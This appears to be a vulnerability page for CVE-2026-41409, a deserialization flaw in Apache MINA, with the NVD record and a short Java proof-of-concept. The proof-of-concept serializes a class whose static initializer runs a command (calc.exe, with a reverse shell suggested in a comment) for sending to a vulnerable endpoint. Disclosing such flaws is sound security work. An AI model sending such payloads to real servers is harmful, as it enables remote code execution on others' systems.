CVE-2026-41409

import java.io.*; import java.util.*; // Define a malicious class with a static initializer // This code block runs when the class is loaded by the JVM class EvilPayload implements Serializable { private static final long serialVersionUID = 1L; static { try { // Malicious action: e.g., open calculator or reverse shell Runtime.getRuntime().exec("calc.exe"); System.out.println("Malicious code executed in static block!"); } catch (Exception e) { e.printStackTrace(); } } } public class CVE202641409POC { public static void main(String[] args) throws Exception { // Serialize the malicious object EvilPayload evil = new EvilPayload(); ByteArrayOutputStream bos = new ByteArrayOutputStream(); ObjectOutputStream oos = new ObjectOutputStream(bos); oos.writeObject(evil); oos.flush(); byte[] payload = bos.toByteArray(); // Output the serialized bytes (hex or base64) to send to the vulnerable server System.out.println("Generated Payload Length: " + payload.length); // In a real attack, send this byte array to the vulnerable Apache MINA endpoint } }

{"cve": {"id": "CVE-2026-41409", "sourceIdentifier": "[email protected]", "published": "2026-04-27T10:16:09.740", "lastModified": "2026-04-29T19:08:07.193", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "The fix for CVE-2024-52046 in Apache MINA AbstractIoBuffer.getObject() was incomplete. The classname allowlist of classes allowed to be deserialized was applied too late after a static initializer in a class to be read might already have been executed.\n\n\n\n\nAffected versions are Apache MINA 2.0.0 <= 2.0.27, 2.1.0 <= 2.1.10, and 2.2.0 <= 2.2.5.\n\n\n\n\nThe problem is resolved in Apache MINA 2.0.28, 2.1.11, and 2.2.6 by \napplying the classname allowlist earlier.\n\n\n\n\nAffected are applications using Apache MINA that call IoBuffer.getObject().\n\n\n\n\nApplications using Apache MINA are advised to upgrade"}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-502"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:apache:mina:*:*:*:*:*:*:*:*", "versionStartIncluding": "2.0.0", "versionEndExcluding": "2.0.28", "matchCriteriaId": "BD2A5F4E-7B53-4235-BE01-DD9B9E3614E0"}, {"vulnerable": true, "criteria": "cpe:2.3:a:apache:mina:*:*:*:*:*:*:*:*", "versionStartIncluding": "2.1.0", "versionEndExcluding": "2.1.11", "matchCriteriaId": "E69C9219-F00B-4677-88B8-3263615586BD"}, {"vulnerable": true, "criteria": "cpe:2.3:a:apache:mina:*:*:*:*:*:*:*:*", "versionStartIncluding": "2.2.0", "versionEndExcluding": "2.2.6", "matchCriteriaId": "EC86281C-5EBB-4250-8575-50EB77E76F3E"}]}]}], "references": [{"url": "https://lists.apache.org/thread/9ddvsq6c4l5bhwq8l14sob4f8qjvx5c9", "source": "[email protected]", "tags": ["Mailing List", "Vendor Advisory"]}]}}